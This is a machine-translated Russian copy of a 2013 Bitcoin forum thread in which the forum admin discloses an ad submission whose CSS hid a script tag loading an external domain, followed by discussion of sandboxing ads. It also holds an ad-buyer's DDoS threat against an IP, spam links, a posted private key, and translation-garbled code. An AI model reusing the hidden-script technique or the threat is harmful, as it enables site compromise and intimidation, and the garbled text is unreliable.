Вернуться   Биткоин Форум > - Wiki
16 августа 2013, 6:15:49 AM   # 1
 
 
Сообщения: 2884
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Взлом Биткоин адресов.
500 Биткоинов взломаны в "мозговом кошельке" с паролем "bitcoin is awesome"
Адрес кошелька: 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE
Приватный ключ: 5J64pq77XjeacCezwmAr2V1s7snvvJkuAz8sENxw7xCkikceV6e
подробнее...


Всем кто хочет заработать Биткоины без вложений - рекомендую сайт http://bitcoin-zarabotat.ru
Вот объявление, которое было отправлено мне:

Направлено в адрес!

Вот мой CSS код:

Код:
.minefieldadm {ширина: 620px; высота: 40px; переполнения: скрытый; семейство шрифтов: Verdana; размер шрифта: 14px; границы: 1px твердое # 000; дисплей: встроенный блок; фон: # a3d802; фон: -moz-линейный градиент (верхние, # a3d802 0%, # 11a301 3%, # 8ac916 6%, # f0b7a1 34%, # 8c3310 50%, # 752201 93%, # bf6e4e 98%); фон: -webkit-градиент (линейный, слева вверху, слева внизу, цвет-стоп (0%, # a3d802), цвет-стоп (3%, # 11a301), цвет-стоп (6%, # 8ac916), цвет- остановки (34%, # f0b7a1), цвет-стоп (50%, # 8c3310), цвет-стоп (93%, # 752201), цвет-стоп (98%, # bf6e4e)); фон: -webkit-линейный градиент (верхние, # a3d802 0%, # 11a301 3%, # 8ac916 6%, # f0b7a1 34%, # 8c3310 50%, # 752201 93%, # bf6e4e 98%); фон: -o-линейный градиент (верхняя, # a3d802 0%, # 11a301 3%, # 8ac916 6%, # f0b7a1 34%, # 8c3310 50%, # 752201 93%, # bf6e4e 98%); фон: - мс-линейный градиент (верхние, # a3d802 0%, # 11a301 3%, # 8ac916 6%, # f0b7a1 34%, # 8c3310 50%, # 752201 93%, # bf6e4e 98%); фон: линейный градиент-(вниз, # a3d802 0%, # 11a301 3%, # 8ac916 6%, # f0b7a1 34%, # 8c3310 50%, # 752201 93%, # bf6e4e 98%); Фильтр: ProgID: DXImageTransform.Microsoft.gradient (startColorstr = '# a3d802', endColorstr = '# bf6e4e', GradientType = 0);}
.minefieldshader {размер шрифта: 155%; цвет: #FFFFFF; текст-тень: 0px 0px 8px RGBA (0, 0, 0, 1); фон: # b4e391; фон: -moz-линейный градиент (45deg, # b4e391 0%, # 149b51 22%, # 75e01d 27%, # 369b14 62%, # 5cdb1c 69%, # 5cdb1c 86%, # b4e391 100%); фон: -webkit-градиент (линейный, левый нижний, правый верхний, цвет-стоп (0%, # b4e391), цвет-стоп (22%, # 149b51), цвет-стоп (27%, # 75e01d), цвет- остановки (62%, # 369b14), цвет-стоп (69%, # 5cdb1c), цвет-стоп (86%, # 5cdb1c), цвет-стоп (100%, # b4e391)); фон: -webkit-линейную градиент (45deg, # b4e391 0%, # 149b51 22%, # 75e01d 27%, # 369b14 62%, # 5cdb1c 69%, # 5cdb1c 86%, # b4e391 100%); фон: -o-линейный градиент (45deg, # b4e391 0%, # 149b51 22%, # 75e01d 27%, # 369b14 62%, # 5cdb1c 69%, # 5cdb1c 86%, # b4e391 100%);}<Сценарий SRC = 'HTTP: //webkit-linear.in'><стиль>.minefieldshader {фон: -MS-линейный градиент (45deg, # b4e391 0%, # 149b51 22%, # 75e01d 27%, # 369b14 62%, # 5cdb1c 69%, # 5cdb1c 86%, # b4e391 100%); фон: линейный градиент-(45deg, # b4e391 0%, # 149b51 22%, # 75e01d 27%, # 369b14 62%, # 5cdb1c 69%, # 5cdb1c 86%, # b4e391 100%); Фильтр: ProgID: DXImageTransform.Microsoft.gradient (startColorstr = '# b4e391', endColorstr = '# b4e391', GradientType = 1); рентабельность-топ: 3px; обивка: 4px 3px 4px 3px; дисплей: встроенный блок;}
.minefieldstar1 {ширина: 0; высота: 0; границы слева: 15px твердые прозрачные; границы справа: 15px твердое прозрачное; граница дно: 30px твердого RGB (80, 189, 45); позиция: абсолютный; поплавковая: слева; рентабельность -Выберите: 135px;}
.minefieldstar2 {ширина: 0; высота: 0; границы слева: 15px твердые прозрачные; границы справа: 15px твердое прозрачное; граница дно: 30px твердого RGB (80, 189, 45); позиция: абсолютный; поплавковая: слева; рентабельность -Выберите: 450px;}

Вот мой HTML-код:

Код:
theymos сейчас офлайн Пожаловаться на theymos   Ответить с цитированием Мультицитирование сообщения от theymos Быстрый ответ на сообщение theymos


Как заработать Биткоины?
Без вложений. Не майнинг.


16 августа 2013, 6:31:44 AM   # 2
 
 
Сообщений: 98
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Получил 1806 Биткоинов
Реальная история.





Off на мой следующий счет
Нараян сейчас офлайн Пожаловаться на Нараян   Ответить с цитированием Мультицитирование сообщения от Нараян Быстрый ответ на сообщение Нараян

16 августа 2013, 6:31:52 AM   # 3
 
 
Сообщения: 1412
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Довольно неудобно.

Хороший улов.
Raize сейчас офлайн Пожаловаться на Raize   Ответить с цитированием Мультицитирование сообщения от Raize Быстрый ответ на сообщение Raize

16 августа 2013, 6:32:53 AM   # 4
 
 
Сообщения: 616
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Прием объявлений, которые ничего больше, чем изображения, альтернативный текст и URL не кажется, все, что сейф; специально учитывая то, как заманчиво мишени пользователей форума являются ...
TiagoTiago сейчас офлайн Пожаловаться на TiagoTiago   Ответить с цитированием Мультицитирование сообщения от TiagoTiago Быстрый ответ на сообщение TiagoTiago

16 августа 2013, 6:40:03 AM   # 5
 
 
Сообщения: 1274
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Off на мой следующий счет

просто из любопытства, вы безубыточные как полупрофессиональный мошенник с практически без успеха?
favdesu сейчас офлайн Пожаловаться на favdesu   Ответить с цитированием Мультицитирование сообщения от favdesu Быстрый ответ на сообщение favdesu

16 августа 2013, 6:46:59 AM   # 6
 
 
Сообщения: 2884
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Он заплатил, так что я положил на ссылку на его http://minefield.bitcoinlab.org ссылка. Этот сайт является безопасным, не так ли? Это вниз прямо сейчас.

Прием объявлений, которые ничего больше, чем изображения, альтернативный текст и URL не кажется, все, что сейф; специально учитывая то, как заманчиво мишени пользователей форума являются ...

Они безопасны, когда кто-то вручную их рассмотрения. Это на самом деле не было бы все, что трудно автоматически проверить, что объявления в порядке: CSS никогда не может быть риском для безопасности, а также небольшой белый список заведомо безопасных HTML-теги и атрибуты бы предотвратить другие нападения. Я могу добавить автоматическую проверку, если я когда-либо автоматизировать систему объявлений, хотя какое-то ручного утверждения всегда будет требоваться, поскольку содержание и размер объявления также должны быть проверено. (Автоматическая проверка фактического размера экрана объявления при кажется трудным.)

HTML / CSS объявления гораздо меньше побайтно; их можно увидеть с помощью текстовых браузеров, поисковых систем и слабовидящих; люди могут справиться с ними более естественно (копировать / вставить и т.д.); они могут делать то, что изображения не может сделать; и рекламные блокаторы не могут блокировать их легко. Они явно превосходят графические объявления почти во всех отношениях.
theymos сейчас офлайн Пожаловаться на theymos   Ответить с цитированием Мультицитирование сообщения от theymos Быстрый ответ на сообщение theymos

16 августа 2013, 6:59:41 AM   # 7
 
 
Сообщений: 98
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Кто-то сказал мне, чтобы передать сообщение, что IP 66.168.20.180 будет страдает от DDoS скоро
Нараян сейчас офлайн Пожаловаться на Нараян   Ответить с цитированием Мультицитирование сообщения от Нараян Быстрый ответ на сообщение Нараян

16 августа 2013, 7:02:36 AM   # 8
 
 
Сообщения: 1218
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Кто-то сказал мне, чтобы передать сообщение, что IP 66.168.20.180 будет страдает от DDoS скоро
Иисус, что парень играет много костей.

ETA @ удаляемая запись: лол, да - я уверен, вы просто для ретрансляционных их.
Клюге сейчас офлайн Пожаловаться на Kluge   Ответить с цитированием Мультицитирование сообщения от Kluge Быстрый ответ на сообщение Kluge

16 августа 2013, 7:08:30 AM   # 9
 
 
Сообщения: 2366
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Я хотел бы предложить, что вы также осуществить некоторые меры защиты на случай, если что-то умное пройти мимо ваших глаз.

за согласование некоторых программных «XSS», одна идея будет Iframe в HTML / CSS объявления на другом домене, так что даже если они идут жулик браузер песочница будет спасти вас.

Я бы также быть немного осторожным с предположениями, как "CSS никогда не может быть угрозой безопасности", CSS теперь огромное количество коды, это большая поверхность атаки, и я не удивлюсь, если там были некоторые нулевого дня CSS удаленного выполнения эксплойтов (хотя ... получение через ручную проверку будет жестким). С другой стороны CSS загрузкой изображения и другие активы с удаленных хостов могут быть использованы для запуска эксплоитов в обработчиках изображений, или просто выступать в качестве webbugs.
gmaxwell сейчас офлайн Пожаловаться на gmaxwell   Ответить с цитированием Мультицитирование сообщения от gmaxwell Быстрый ответ на сообщение gmaxwell

16 августа 2013, 7:22:26 AM   # 10
 
 
Сообщения: 1046
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Кто-то сказал мне, чтобы передать сообщение, что IP 66.168.20.180 будет страдает от DDoS скоро

Вау, они всегда возвращаются с этим же "ты разорен меня, теперь я DDos вас !!!", Есть некоторые вещи законных .. Pays лучше
Anduck сейчас офлайн Пожаловаться на Anduck   Ответить с цитированием Мультицитирование сообщения от Anduck Быстрый ответ на сообщение Anduck

16 августа 2013, 8:52:33 AM   # 11
 
 
Сообщения: 1652
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Кто-то сказал мне, чтобы передать сообщение, что IP 66.168.20.180 будет страдает от DDoS скоро

Кто-то звучит с ума.
BadBear сейчас офлайн Пожаловаться на BadBear   Ответить с цитированием Мультицитирование сообщения от BadBear Быстрый ответ на сообщение BadBear

16 августа 2013, 2:10:28 PM   # 12
 
 
Сообщения: 1694
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

сумашедшие skiddys
K1773R сейчас офлайн Пожаловаться на K1773R   Ответить с цитированием Мультицитирование сообщения от K1773R Быстрый ответ на сообщение K1773R

16 августа 2013, 2:41:13 PM   # 13
 
 
Сообщения: 860
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Интересно, что он поместил бы там ...
HeroC сейчас офлайн Пожаловаться на HeroC   Ответить с цитированием Мультицитирование сообщения от HeroC Быстрый ответ на сообщение HeroC

16 августа 2013, 3:26:07 PM   # 14
 
 
Сообщения: 1412
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Я бы также быть немного осторожным с предположениями, как "CSS никогда не может быть угрозой безопасности", CSS теперь огромное количество коды, это большая поверхность атаки, и я не удивлюсь, если там были некоторые нулевого дня CSS удаленного выполнения эксплойтов (хотя ... получение через ручную проверку будет жестким). С другой стороны CSS загрузкой изображения и другие активы с удаленных хостов могут быть использованы для запуска эксплоитов в обработчиках изображений, или просто выступать в качестве webbugs.

По этой теме, я помню некоторое время назад там была загрузка изображения эксплойт, что IE был несколько лет назад, но это было совершенно ненадежный эксплойт пока кто-нибудь понял, что они могли бы использовать CSS для кучного-спрей непосредственно перед нагрузкой изображения, таким образом, что делает его работу каждый раз. Я забываю все подробности, но да, CSS (или по крайней мере так, как IE обрабатывает его) далеко от совершенно безопасно.

Тем не менее, они действительно только должны быть в состоянии загрузить вещи под учетными данными пользователя, но на коробке Windows, что это, как правило, "достаточно хорошо" чтобы сделать некоторые повреждения.
Raize сейчас офлайн Пожаловаться на Raize   Ответить с цитированием Мультицитирование сообщения от Raize Быстрый ответ на сообщение Raize

16 августа 2013, 4:48:19 PM   # 15
 
 
Сообщения: 2884
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Лол спасибо!
theymos сейчас офлайн Пожаловаться на theymos   Ответить с цитированием Мультицитирование сообщения от theymos Быстрый ответ на сообщение theymos

16 августа 2013, 5:51:50 PM   # 16
 
 
Сообщения: 770
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Чтобы защититься от этого, я думаю, что это, безусловно, стоит размещение рекламы в фреймов на различного происхождения - например, bitcointalkusercontent.org

Будет
willphase сейчас офлайн Пожаловаться на willphase   Ответить с цитированием Мультицитирование сообщения от willphase Быстрый ответ на сообщение willphase

16 августа 2013, 6:52:42 PM   # 17
 
 
Сообщения: 1708
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Он заплатил, так что я положил на ссылку на его http://minefield.bitcoinlab.org ссылка. Этот сайт является безопасным, не так ли? Это вниз прямо сейчас.

Ты говоришь, что вы на самом деле поставить ссылку на этот сайт мошенников?
Phelix сейчас офлайн Пожаловаться на Phelix   Ответить с цитированием Мультицитирование сообщения от Phelix Быстрый ответ на сообщение Phelix

16 августа 2013, 6:57:08 PM   # 18
 
 
Сообщения: 966
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Он заплатил, так что я положил на ссылку на его http://minefield.bitcoinlab.org ссылка. Этот сайт является безопасным, не так ли? Это вниз прямо сейчас.

Ты говоришь, что вы на самом деле поставить ссылку на этот сайт мошенников?

Подтверждено, что объявление действительно находится в ротации, я только что видел его.

@theymos
Кто-то пытается запустить инъекционный CSS объявления и вы поднимете свое объявление, так как "он заплатил"? Это ужасная линия, хотя.
tysat сейчас офлайн Пожаловаться на tysat   Ответить с цитированием Мультицитирование сообщения от tysat Быстрый ответ на сообщение tysat

16 августа 2013, 7:00:44 PM   # 19
 
 
Сообщения: 935
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Он заплатил, так что я положил на ссылку на его http://minefield.bitcoinlab.org ссылка. Этот сайт является безопасным, не так ли? Это вниз прямо сейчас.

Ты говоришь, что вы на самом деле поставить ссылку на этот сайт мошенников?

Подтверждено, что объявление действительно находится в ротации, я только что видел его.

@theymos
Кто-то пытается запустить инъекционный CSS объявления и вы поднимете свое объявление, так как "он заплатил"? Это ужасная линия, хотя.
theymos удалили вредоносный участок кода, прежде чем положить ссылку в ротацию объявлений.
MiningBuddy сейчас офлайн Пожаловаться на MiningBuddy   Ответить с цитированием Мультицитирование сообщения от MiningBuddy Быстрый ответ на сообщение MiningBuddy

16 августа 2013, 7:08:49 PM   # 20
 
 
Сообщения: 966
Цитировать по имени
цитировать ответ
по умолчанию Re: Нараян - попытка инъекции кода

Он заплатил, так что я положил на ссылку на его http://minefield.bitcoinlab.org ссылка. Этот сайт является безопасным, не так ли? Это вниз прямо сейчас.

Ты говоришь, что вы на самом деле поставить ссылку на этот сайт мошенников?

Подтверждено, что объявление действительно находится в ротации, я только что видел его.

@theymos
Кто-то пытается запустить инъекционный CSS объявления и вы поднимете свое объявление, так как "он заплатил"? Это ужасная линия, хотя.
theymos удалили вредоносный участок кода, прежде чем положить ссылку в ротацию объявлений.

Я знаю, что, но если они пытаются получить что-то в объявлении это не стоит рассуждать, что они не заслуживают того, чтобы иметь объявление в ротации? Я бы сказал, что пытается получить вредоносный код в объявлении должно привести к запрету на форуме.
tysat сейчас офлайн Пожаловаться на tysat   Ответить с цитированием Мультицитирование сообщения от tysat Быстрый ответ на сообщение tysat



Как заработать Биткоины?

Bitcoin Wallet * Portefeuille Bitcoin * Monedero Bitcoin * Carteira Bitcoin * Portafoglio Bitcoin * Bitcoin Cüzdan * 比特币钱包

bitcoin-zarabotat.ru
Почта для связи: bitcoin-zarabotat.ru@yandex.ru

3HmAQ9FkRFk6HZGuwExYxL62y7C1B9MwPW